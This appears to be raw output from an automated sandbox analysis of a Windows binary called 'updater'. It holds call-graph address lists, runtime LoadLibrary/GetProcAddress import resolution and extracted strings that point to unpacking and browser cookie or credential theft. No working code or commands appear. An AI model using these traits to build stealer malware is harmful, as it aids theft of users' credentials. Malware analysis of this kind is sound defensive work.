9 API calls 59330->59472 59334 13fedae 59331->59334 59336 13ecd8e 8 API calls 59334->59336 59335 13ff35d 59473 13f4789 9 API calls 59335->59473 59338 13fedc0 59336->59338 59339 13ecd8e 8 API calls 59338->59339 59340 13feddf 59339->59340 59341 13ecd8e 8 API calls 59340->59341 59342 13fedf1 59341->59342 59452 13fe5c6 9 API calls 59342->59452 59344 13fee1c 59454 13fcef5 9 API calls 59344->59454 59345 13fedff 59345->59344 59453 13f6745 8 API calls 59345->59453 59348 13fee40 59349 13ecd8e 8 API calls 59348->59349 59350 13fee52 59349->59350 59455 13fe4e8 9 API calls 59350->59455 59352 13fee6b 59353 13ecd8e 8 API calls 59352->59353 59354 13fee7a 59353->59354 59355 13ecd8e 8 API calls 59354->59355 59356 13fee98 59355->59356 59456 1401702 79 API calls ___scrt_fastfail 59356->59456 59358 13feeb0 59358->59292 59359 13feec7 59358->59359 59457 13f64df 8 API calls 59358->59457 59361 13ecd8e 8 API calls 59359->59361 59373 13ff0b0 59359->59373 59459 13f64a7 8 API calls 59359->59459 59361->59359 59363 13fef42 59365 13ecd8e 8 API calls 59363->59365 59364 13ecd8e 8 API calls 59364->59373 59377 13fef5d 59365->59377 59366 13ff17a 59369 13ecd8e 8 API calls 59366->59369 59367 13ff11f 59367->59366 59370 13ecd8e 8 API calls 59367->59370 59371 13ff194 59369->59371 59370->59367 59372 13ecd8e 8 API calls 59371->59372 59374 13ff1ae 59372->59374 59373->59364 59373->59367 59460 13ed120 9 API calls ctype 59373->59460 59375 13ecd8e 8 API calls 59374->59375 59378 13ff1c3 59375->59378 59376 13ecd8e 8 API calls 59379 13fefe1 59376->59379 59377->59376 59461 13fe615 9 API calls 59378->59461 59380 13ecd8e 8 API calls 59379->59380 59384 13feff6 59380->59384 59382 13ff1e1 59383 13ecd8e 8 API calls 59382->59383 59385 13ff1f4 59383->59385 59458 1402a3d 8 API calls 59384->59458 59387 13ff1fe 59385->59387 59388 13ff218 59385->59388 59390 13ecd8e 8 API calls 59387->59390 59462 1402a3d 8 API calls 59388->59462 59389 13ff022 59392 13ecd8e 8 API calls 59389->59392 59393 13ff213 59390->59393 59392->59359 59396 13ecd8e 8 API calls 59393->59396 59394 13ff221 59463 13ed0e0 5 API calls ___scrt_fastfail 59394->59463 59396->59291 59398 13f8293 59397->59398 59399 13f8251 59397->59399 59398->59248 59399->59398 59400 13f829c 59399->59400 59401 13f8288 59399->59401 59400->59398 59476 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59400->59476 59475 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59401->59475 59405 13fe388 59404->59405 59418 13fe493 59404->59418 59405->59418 59477 13fdcbf 59405->59477 59407 13fe39c ___scrt_fastfail 59407->59418 59493 13f5192 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59407->59493 59409 13fe3c4 59409->59418 59494 13f5192 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59409->59494 59411 13fe3d8 59413 13fe442 59411->59413 59411->59418 59495 13f5192 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59411->59495 59414 13fe4cd 59413->59414 59496 13f5192 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59413->59496 59498 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59414->59498 59417 13fe478 59417->59418 59497 13f5192 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59417->59497 59418->59251 59418->59257 59418->59292 59420 13fe4b9 59420->59418 59422 13fe36e 76 API calls 59420->59422 59421 13fe488 59421->59414 59421->59418 59421->59420 59422->59418 59423->59246 59424->59256 59426 13fe1cb 59425->59426 59427 13fe1ac 59425->59427 59426->59270 59849 13ecc96 59427->59849 59430 13ecd8e 8 API calls 59430->59426 59431->59260 59432->59265 59433->59261 59435 13ecdae 59434->59435 59436 13ecda2 59434->59436 59435->59266 59852 13ecd4b 59436->59852 59438->59271 59439->59274 59440->59277 59441->59275 59442->59286 59443->59285 59444->59289 59445->59291 59446->59295 59447->59297 59448->59301 59449->59307 59450->59312 59451->59317 59452->59345 59453->59344 59454->59348 59455->59352 59456->59358 59457->59363 59458->59389 59459->59359 59460->59373 59461->59382 59462->59394 59463->59393 59464->59299 59465->59305 59466->59308 59467->59292 59468->59316 59469->59324 59470->59327 59471->59330 59472->59335 59473->59291 59474->59292 59475->59398 59476->59398 59480 13fdcdf 59477->59480 59484 13fde7e 59477->59484 59478 13fe154 59508 13f4789 9 API calls 59478->59508 59480->59484 59492 13fddce 59480->59492 59499 13f868b 59480->59499 59506 13f451b 9 API calls 59480->59506 59482 13fe15e 59482->59484 59509 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59482->59509 59484->59407 59485 13f45ec 9 API calls 59485->59492 59486 13f8a99 6 API calls 59486->59492 59489 13e06db 5 API calls 59489->59492 59490 13fcc8a _strlen 59490->59492 59491 13fe07d _strlen 59491->59492 59492->59478 59492->59482 59492->59485 59492->59486 59492->59489 59492->59490 59492->59491 59507 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59492->59507 59493->59409 59494->59411 59495->59411 59496->59417 59497->59421 59498->59418 59510 13fc5db 59499->59510 59505 13f869b 59505->59480 59506->59480 59507->59492 59508->59482 59509->59484 59511 13f8697 59510->59511 59512 13fc5e7 59510->59512 59511->59505 59514 13f8615 59511->59514 59519 13fc510 59512->59519 59515 13f8684 59514->59515 59517 13f862b 59514->59517 59515->59505 59518 13e2264 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59515->59518 59516 13f8656 _strlen 59516->59517 59517->59515 59517->59516 59518->59505 59521 13fc52f 59519->59521 59525 13fc536 59519->59525 59520 13fc58e 59520->59521 59522 13fc1ef 74 API calls 59520->59522 59521->59511 59524 13fc5ad 59522->59524 59524->59521 59526 13f874c 5 API calls 59524->59526 59525->59520 59525->59521 59528 13fc1ef 59525->59528 59562 13f874c 59525->59562 59526->59521 59572 13fc0fa 59528->59572 59531 13f8615 _strlen 59532 13fc277 59531->59532 59533 13fc259 59532->59533 59585 13e6503 59532->59585 59533->59525 59538 13fc338 59543 13fc36d 59538->59543 59546 13fc2e2 ___scrt_fastfail 59538->59546 59628 13eb697 11 API calls 59538->59628 59539 13fc2c6 59540 13fc2cb 59539->59540 59539->59546 59627 13e0a7c 10 API calls ctype 59540->59627 59629 13e0a7c 10 API calls ctype 59543->59629 59544 13fc397 59631 13e84f9 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59544->59631 59545 13e6566 LeaveCriticalSection 59545->59533 59546->59544 59554 13fc429 59546->59554 59549 13fc37c 59630 13e84f9 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59549->59630 59550 13fc39f 59632 13e6566 59550->59632 59553 13fc443 59555 13fc2da 59553->59555 59556 13f874c 5 API calls 59553->59556 59554->59553 59600 13fbe05 59554->59600 59555->59545 59556->59555 59559 13e06db 5 API calls 59560 13fc49c 59559->59560 59636 13e84f9 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59560->59636 59563 13f875d 59562->59563 59564 13f8762 59562->59564 59565 13e6587 3 API calls 59563->59565 59571 13f8894 59564->59571 59848 13e6629 LeaveCriticalSection 59564->59848 59565->59564 59567 13f87a3 59568 13e06db 5 API calls 59567->59568 59569 13f8857 ctype ___scrt_fastfail 59567->59569 59568->59567 59570 13e06db 5 API calls 59569->59570 59569->59571 59570->59571 59571->59525 59573 13fc129 59572->59573 59575 13fc12e 59572->59575 59573->59531 59573->59533 59574 13fc1af 59574->59573 59640 13f86ca _strlen 59574->59640 59575->59573 59575->59574 59576 13fc15a 59575->59576 59637 1426aab 59576->59637 59580 13fc1ce 59580->59573 59582 1426aab 38 API calls 59580->59582 59581 13fbe05 74 API calls 59583 13fc17a 59581->59583 59582->59573 59583->59573 59584 13e06db 5 API calls 59583->59584 59584->59573 59586 13e6564 59585->59586 59587 13e650c 59585->59587 59593 13e84b8 59586->59593 59587->59586 59588 13e6538 59587->59588 59655 13e08e2 LeaveCriticalSection 59587->59655 59656 13e08c1 EnterCriticalSection GetCurrentThreadId 59588->59656 59591 13e6543 59591->59586 59657 13e08c1 EnterCriticalSection GetCurrentThreadId 59591->59657 59594 13e6503 3 API calls 59593->59594 59595 13e84c8 59594->59595 59658 13e83b8 59595->59658 59597 13e84e5 59598 13e6566 LeaveCriticalSection 59597->59598 59599 13e84f1 59598->59599 59599->59538 59599->59539 59601 13fc050 59600->59601 59602 13fbe21 59600->59602 59601->59559 59679 13e08c1 EnterCriticalSection GetCurrentThreadId 59602->59679 59604 13fbfc9 59605 13fbfda 59604->59605 59607 13eea32 9 API calls 59604->59607 59608 13fbfe5 59605->59608 59609 13e06db 5 API calls 59605->59609 59607->59605 59732 13e0af7 9 API calls 59608->59732 59609->59608 59613 13fbfef 59621 13fc02f ctype 59613->59621 59733 14054b2 9 API calls 59613->59733 59616 13fc00f _strlen 59617 13e0614 6 API calls 59616->59617 59618 13fc020 59617->59618 59618->59621 59734 14054b2 9 API calls 59618->59734 59735 13e08e2 LeaveCriticalSection 59621->59735 59622 13e06db 5 API calls 59625 13fbe2c 59622->59625 59625->59604 59625->59622 59626 13fc0fa 73 API calls 59625->59626 59680 13fc9fb 59625->59680 59692 13e094b 59625->59692 59695 13eeedb 59625->59695 59716 13eea32 59625->59716 59724 13ef3f8 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 59625->59724 59725 13ef301 59625->59725 59626->59625 59627->59555 59628->59538 59629->59549 59630->59555 59631->59550 59633 13e656f 59632->59633 59634 13e6580 59632->59634 59633->59634 59847 13e08e2 LeaveCriticalSection 59633->59847 59634->59533 59636->59553 59641 1426204 59637->59641 59639 13fc165 59639->59581 59640->59580 59642 1425095 std::_Stodx_v2 18 API calls 59641->59642 59644 1426216 59642->59644 59643 142624f 59646 1422f3e __fassign 35 API calls 59643->59646 59644->59643 59645 142622b 59644->59645 59654 142623b 59644->59654 59648 1423529 __wsopen_s 18 API calls 59645->59648 59649 142625b 59646->59649 59647 1423686 std::_Stodx_v2 38 API calls 59647->59649 59648->59654 59649->59647 59650 142628a 59649->59650 59652 1426a31 std::_Stodx_v2 18 API calls 59650->59652 59653 14262f4 59650->59653 59651 1426a31 std::_Stodx_v2 18 API calls 59651->59654 59652->59653 59653->59651 59654->59639 59655->59587 59656->59591 59657->59591 59659 13e83d6 59658->59659 59660 13e83e5 59658->59660 59667 13e83ea 59659->59667 59678 13eace3 11 API calls 59659->59678 59661 13e8402 59660->59661 59660->59667 59670 13e79bc 59660->59670 59662 13e0929 6 API calls 59661->59662 59661->59667 59665 13e841f 59662->59665 59665->59667 59668 13e843d 59665->59668 59674 13e72f4 59665->59674 59667->59597 59668->59667 59669 13e06db 5 API calls 59668->59669 59669->59667 59671 13e79c8 59670->59671 59672 13e79d5 59670->59672 59673 13e7ab9 11 API calls 59671->59673 59672->59661 59673->59672 59675 13e7302 59674->59675 59676 13e72fd 59674->59676 59677 13e72a1 11 API calls 59675->59677 59676->59668 59677->59676 59678->59660 59679->59625 59681 13fca0c 59680->59681 59691 13fca10 59681->59691 59736 13e08c1 EnterCriticalSection GetCurrentThreadId 59681->59736 59683 13fca1d 59737 13e6587 59683->59737 59689 13fca43 59797 13e08e2 LeaveCriticalSection 59689->59797 59691->59625 59798 13e096b 59692->59798 59694 13e0954 ___scrt_fastfail 59694->59625 59696 13eeef5 59695->59696 59697 13ef001 59695->59697 59802 13e08c1 EnterCriticalSection GetCurrentThreadId 59696->59802 59697->59625 59699 13eef04 59803 13eed15 59699->59803 59701 13eefd8 59827 13e0af7 9 API calls 59701->59827 59703 13eef89 59703->59701 59815 13eca37 59703->59815 59704 13eeff7 59828 13e08e2 LeaveCriticalSection 59704->59828 59705 13fc9fb 74 API calls 59713 13eef0c 59705->59713 59709 13e06db 5 API calls 59710 13eefc6 59709->59710 59710->59701 59826 13e0a3d 7 API calls 59710->59826 59713->59701 59713->59703 59713->59705 59715 13eed15 15 API calls 59713->59715 59813 13ee113 9 API calls 59713->59813 59814 13eea62 9 API calls 59713->59814 59715->59713 59717 13eea3f 59716->59717 59718 13eea5a 59716->59718 59829 13e08c1 EnterCriticalSection GetCurrentThreadId 59717->59829 59718->59625 59720 13eea4a 59830 13ee113 9 API calls 59720->59830 59722 13eea52 59831 13e08e2 LeaveCriticalSection 59722->59831 59724->59625 59832 13ef198 59725->59832 59728 13eca37 9 API calls 59729 13ef31a 59728->59729 59841 13ef1f4 59729->59841 59732->59613 59733->59616 59734->59621 59735->59601 59736->59683 59738 13e659d 59737->59738 59739 13e6624 59737->59739 59738->59739 59740 13e08c1 EnterCriticalSection GetCurrentThreadId 59738->59740 59741 13e08e2 LeaveCriticalSection 59738->59741 59742 13fc6cf 59739->59742 59740->59738 59741->59738 59744 13fc736 ___scrt_fastfail 59742->59744 59754 13fc6f3 59742->59754 59743 13e6503 EnterCriticalSection GetCurrentThreadId LeaveCriticalSection 59743->59754 59745 13fc7b4 59744->59745 59746 13fc764 59744->59746 59747 1404940 74 API calls 59745->59747 59748 13e0a59 6 API calls 59746->59748 59760 13fc78d 59747->59760 59749 13fc76e 59748->59749 59753 1404940 74 API calls 59749->59753 59749->59760 59750 13fc7f6 59755 13f874c EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59750->59755 59762 13fc814 59750->59762 59751 13e6566 LeaveCriticalSection 59751->59754 59752 13fc5fb 11 API calls 59752->59750 59756 13fc786 59753->59756 59754->59743 59754->59744 59754->59751 59757 13fc793 59754->59757 59755->59762 59758 13e06db EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59756->59758 59759 13e21f9 9 API calls 59757->59759 59758->59760 59763 13fc7a9 59759->59763 59760->59750 59760->59752 59761 13fc99a 59765 13eea32 9 API calls 59761->59765 59769 13fc9b1 59761->59769 59764 13fc977 59762->59764 59767 13fc85d 59762->59767 59768 13fc8a6 59762->59768 59796 13e6629 LeaveCriticalSection 59763->59796 59764->59761 59766 13e0a59 6 API calls 59764->59766 59765->59769 59766->59761 59772 13ed917 9 API calls 59767->59772 59774 13ed917 9 API calls 59768->59774 59770 13fc9c5 59769->59770 59771 13fc9e1 59769->59771 59773 13e21f9 9 API calls 59770->59773 59775 13e21f9 9 API calls 59771->59775 59776 13fc87c 59772->59776 59777 13fc9d4 59773->59777 59778 13fc8c6 59774->59778 59779 13fc9dc 59775->59779 59780 13ed917 9 API calls 59776->59780 59781 13e06db EnterCriticalSection GetCurrentThreadId LeaveCriticalSection HeapFree GetLastError 59777->59781 59782 13ed917 9 API calls 59778->59782 59785 13e0af7 9 API calls 59779->59785 59783 13fc894 59780->59783 59781->59779 59784 13fc8df 59782->59784 59787 13ed917 9 API calls 59783->59787 59786 13ed917 9 API calls 59784->59786 59785->59763 59788 13fc8f8 59786->59788 59787->59764 59789 13ed917 9 API calls 59788->59789 59790 13fc911 59789->59790 59791 13ed917 9 API calls 59790->59791 59792 13fc92a 59791->59792 59793 13ed917 9 API calls 59792->59793 59794 13fc943 59793->59794 59795 13ed917 9 API calls 59794->59795 59795->59783 59796->59689 59797->59691 59799 13e0974 59798->59799 59800 13e0614 6 API calls 59799->59800 59801 13e097f 59799->59801 59800->59801 59801->59694 59802->59699 59807 13eed29 59803->59807 59809 13eed31 59803->59809 59804 13ed4af 14 API calls 59805 13eede8 59804->59805 59808 13e21f9 9 API calls 59805->59808 59806 13eed50 59806->59807 59810 13e21f9 9 API calls 59806->59810 59807->59713 59811 13eeea1 59808->59811 59809->59804 59809->59805 59809->59806 59809->59807 59810->59807 59812 13e0af7 9 API calls 59811->59812 59812->59806 59813->59713 59814->59713 59817 13eca42 59815->59817 59821 13ecaa4 59815->59821 59816 13eca6a 59819 13ecaa6 59816->59819 59823 13eca7d 59816->59823 59817->59816 59818 13ec156 8 API calls 59817->59818 59817->59821 59818->59816 59820 13ec2d6 _strlen 59819->59820 59820->59821 59821->59709 59822 13eca99 59822->59821 59824 13ec252 8 API calls 59822->59824 59823->59822 59825 13ec1d2 8 API calls 59823->59825 59824->59821 59825->59822 59826->59701 59827->59704 59828->59697 59829->59720 59830->59722 59831->59718 59833 13ef1ce 59832->59833 59834 13ef1a3 59832->59834 59835 13ef1c2 59833->59835 59836 13e08c1 EnterCriticalSection GetCurrentThreadId 59833->59836 59834->59833 59837 13ef1b8 59834->59837 59835->59728 59838 13ef1dc 59836->59838 59839 13e08c1 EnterCriticalSection GetCurrentThreadId 59837->59839 59840 13e21f9 9 API calls 59838->59840 59839->59835 59840->59835 59842 13ef1fb 59841->59842 59843 13ef212 59841->59843 59844 13e0af7 9 API calls 59842->59844 59843->59625 59845 13ef205 59844->59845 59846 13e08e2 LeaveCriticalSection 59845->59846 59846->59843 59847->59634 59848->59567 59850 13e094b 6 API calls 59849->59850 59851 13ecca3 59850->59851 59851->59426 59851->59430 59853 13e098e 8 API calls 59852->59853 59854 13ecd63 ___scrt_fastfail 59853->59854 59854->59435 59855 13f13a1 59856 13f13d6 59855->59856 59858 13f1411 59856->59858 59872 13ec537 8 API calls 59856->59872 59859 13e84b8 11 API calls 59858->59859 59868 13efc8b 59858->59868 59860 13f1459 59859->59860 59862 13f14d5 59860->59862 59863 13f14a5 59860->59863 59873 13eb78b 11 API calls 59862->59873 59865 13f342a 59863->59865 59871 13f14bb 59863->59871 59864 13f2a48 59865->59868 59875 13e0a7c 10 API calls ctype 59865->59875 59874 13e66c2 LeaveCriticalSection 59868->59874 59869 13f3485 59870 13f8615 _strlen 59870->59871 59871->59868 59871->59869 59871->59870 59872->59858 59873->59868 59874->59864 59875->59868 59876 142101d 59884 14220f3 59876->59884 59879 1421026 59881 142102e 59882 1421039 59881->59882 59898 142212f DeleteCriticalSection 59881->59898 59885 14220fc 59884->59885 59887 1422125 59885->59887 59888 1421022 59885->59888 59899 1422330 59885->59899 59904 142212f DeleteCriticalSection 59887->59904 59888->59879 59890 142114b 59888->59890 59920 1422241 59890->59920 59893 1421160 59893->59881 59895 142116e 59896 142117b 59895->59896 59926 142117e 6 API calls ___vcrt_FlsFree 59895->59926 59896->59881 59898->59879 59905 14221f8 59899->59905 59902 1422368 InitializeCriticalSectionAndSpinCount 59903 1422353 59902->59903 59903->59885 59904->59888 59906 1422210 59905->59906 59910 1422239 59905->59910 59906->59910 59912 142215e 59906->59912 59909 1422225 GetProcAddress 59909->59910 59911 1422233 59909->59911 59910->59902 59910->59903 59911->59910 59917 142216a ___vcrt_FlsGetValue 59912->59917 59913 14221de 59913->59909 59913->59910 59914 1422180 LoadLibraryExW 59915 14221e5 59914->59915 59916 142219e GetLastError 59914->59916 59915->59913 59918 14221ed FreeLibrary 59915->59918 59916->59917 59917->59913 59917->59914 59919 14221c0 LoadLibraryExW 59917->59919 59918->59913 59919->59915 59919->59917 59921 14221f8 ___vcrt_FlsGetValue 5 API calls 59920->59921 59922 142225b 59921->59922 59923 1422274 TlsAlloc 59922->59923 59924 1421155 59922->59924 59924->59893 59925 14222f2 6 API calls ___vcrt_FlsGetValue 59924->59925 59925->59895 59926->59893

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 13c3507-13c353d 1 13c353f-13c3551 call 141db91 0->1 2 13c3575-13c357b 0->2 1->2 10 13c3553-13c3574 call 141dfe8 call 141db47 1->10 4 13c358c-13c35a1 LoadLibraryA 2->4 5 13c357d 2->5 8 13c35c2-13c35e8 4->8 9 13c35a3-13c35ab call 13c39f5 4->9 7 13c357f-13c358a 5->7 7->4 7->7 11 13c3628-13c362e 8->11 12 13c35ea-13c35fc call 141db91 8->12 24 13c35ad 9->24 25 13c35b9-13c35bd GetProcAddress 9->25 10->2 16 13c363f-13c364e LoadLibraryA 11->16 17 13c3630 11->17 12->11 29 13c35fe-13c3627 call 141dfe8 call 141db47 12->29 22 13c36b8-13c36df 16->22 23 13c3650-13c366d call 13c3a64 call 13dd668 GetProcAddress call 13c3acf 16->23 21 13c3632-13c363d 17->21 21->16 21->21 26 13c371b-13c3721 22->26 27 13c36e1-13c36f3 call 141db91 22->27 68 13c366f 23->68 69 13c367b-13c368c GetProcAddress call 13c3b4c 23->69 31 13c35af-13c35b7 24->31 25->8 36 13c3732-13c3744 LoadLibraryA 26->36 37 13c3723 26->37 27->26 45 13c36f5-13c371a call 141dfe8 call 141db47 27->45 29->11 31->25 31->31 42 13c374a-13c3752 call 13c3c3d 36->42 43 13c37f0-13c380f 36->43 41 13c3725-13c3730 37->41 41->36 41->41 58 13c3754 42->58 59 13c3760-13c37b0 GetProcAddress call 13c3cb4 call 13dd5da GetProcAddress call 13c3d2b call 13dd6f2 GetProcAddress call 13c3d9a 42->59 46 13c384b-13c3851 43->46 47 13c3811-13c3823 call 141db91 43->47 45->26 50 13c3862-13c3874 LoadLibraryA 46->50 51 13c3853 46->51 47->46 71 13c3825-13c384a call 141dfe8 call 141db47 47->71 60 13c387a-13c3882 call 13c3e87 50->60 61 13c3930-13c3954 50->61 57 13c3855-13c3860 51->57 57->50 57->57 65 13c3756-13c375e 58->65 129 13c37be-13c37d4 GetProcAddress call 13c3e0a 59->129 130 13c37b2 59->130 85 13c3884 60->85 86 13c3890-13c38e0 GetProcAddress call 13c3efd call 13dd4fa GetProcAddress call 13c3f68 call 13dd5c5 GetProcAddress call 13c3fdc 60->86 72 13c398d-13c3993 61->72 73 13c3956-13c3968 call 141db91 61->73 65->59 65->65 77 13c3671-13c3679 68->77 95 13c368e 69->95 96 13c369a-13c36b3 GetProcAddress call 13c3bc6 call 13dd5da GetProcAddress 69->96 71->46 79 13c3995-13c39a0 72->79 80 13c39a2-13c39b4 LoadLibraryA 72->80 73->72 91 13c396a-13c398c call 141dfe8 call 141db47 73->91 77->69 77->77 79->79 79->80 88 13c39b6-13c39eb call 13c412b call 13dd5c5 GetProcAddress call 13c419f call 13dd5da GetProcAddress 80->88 89 13c39f0-13c39f4 80->89 93 13c3886-13c388e 85->93 136 13c38ee-13c392b GetProcAddress call 13c404b call 13dd5c5 GetProcAddress call 13c40bf call 13dd4e5 GetProcAddress 86->136 137 13c38e2 86->137 88->89 91->72 93->86 93->93 102 13c3690-13c3698 95->102 96->22 102->96 102->102 138 13c37d6 129->138 139 13c37e2-13c37eb GetProcAddress 129->139 133 13c37b4-13c37bc 130->133 133->129 133->133 136->61 140 13c38e4-13c38ec 137->140 141 13c37d8-13c37e0 138->141 139->43 140->136 140->140 141->139 141->141
                                  APIs
                                  • LoadLibraryA.KERNEL32(014652C4), ref: 013C3591
                                  • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C35BB
                                  • LoadLibraryA.KERNEL32(01465268), ref: 013C3644
                                  • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C365E
                                  • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C367D
                                  • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C369C
                                  • LoadLibraryA.KERNEL32(0146508C), ref: 013C3737
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C376D
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C3787
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37A1
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37C5
                                  • LoadLibraryA.KERNEL32(01464D40), ref: 013C3867
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C389D
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38B7
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38D1
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C38F5
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C390F
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C3929
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C37E9
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  • GetProcAddress.KERNEL32(00000000,00000000,?,00000008), ref: 013C36B1
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • LoadLibraryA.KERNEL32(0146543C), ref: 013C39A7
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C39CF
                                  • GetProcAddress.KERNEL32(00000000,?,00000008), ref: 013C39E9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad$CriticalSection$EnterLeave$ConditionVariableWake
                                  • String ID: .$.$B.$JBB.$LM\W^Z
                                  • API String ID: 750888802-2939352088
                                  • Opcode ID: 52971c383eb820f421be35625cf8980d64a2197894de7d46863f481200fd8dc3
                                  • Instruction ID: 6201b0f382b88ff6d67866eec4ea879b082492a8278c48bb7e8a582d89734b7e
                                  • Opcode Fuzzy Hash: 52971c383eb820f421be35625cf8980d64a2197894de7d46863f481200fd8dc3
                                  • Instruction Fuzzy Hash: 16D133B5A043829FDF25EFB8E84852D7FA5FB12A1CB19405EE0419F2B9DB748C41CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalDeallocateSection$EnterLeave__fread_nolock
                                  • String ID: $.$(\;$.$.$.$.$.$.$.$.$C$CLK\$FALSE$MEKJ$Mozilla$NULL,secure$[+] data unpacked$[-] data unpacked failed$[@^O$] - [user: $]KM[\K$cATGBBO.$is_secure$ru$secure$sqMAAEGK]
                                  • API String ID: 1177441120-226374639
                                  • Opcode ID: 893b640a4ef04119c3c29ff32779354f579d89657b3eb28c13ae970948e639cf
                                  • Instruction ID: 8f45e7bc6b5c067fe38165f835d315d784e7b63dc8c2e3466e9b64b9e0c13936
                                  • Opcode Fuzzy Hash: 893b640a4ef04119c3c29ff32779354f579d89657b3eb28c13ae970948e639cf
                                  • Instruction Fuzzy Hash: 4713E331D04299DEDB15EBB8E844BDDBBB4BF25308F2041EED0456B2A1DB705A89CF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 01422C70: QueryPerformanceCounter.KERNEL32(?), ref: 01422C8B
                                  • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 013D3EE2
                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 013D3EE9
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
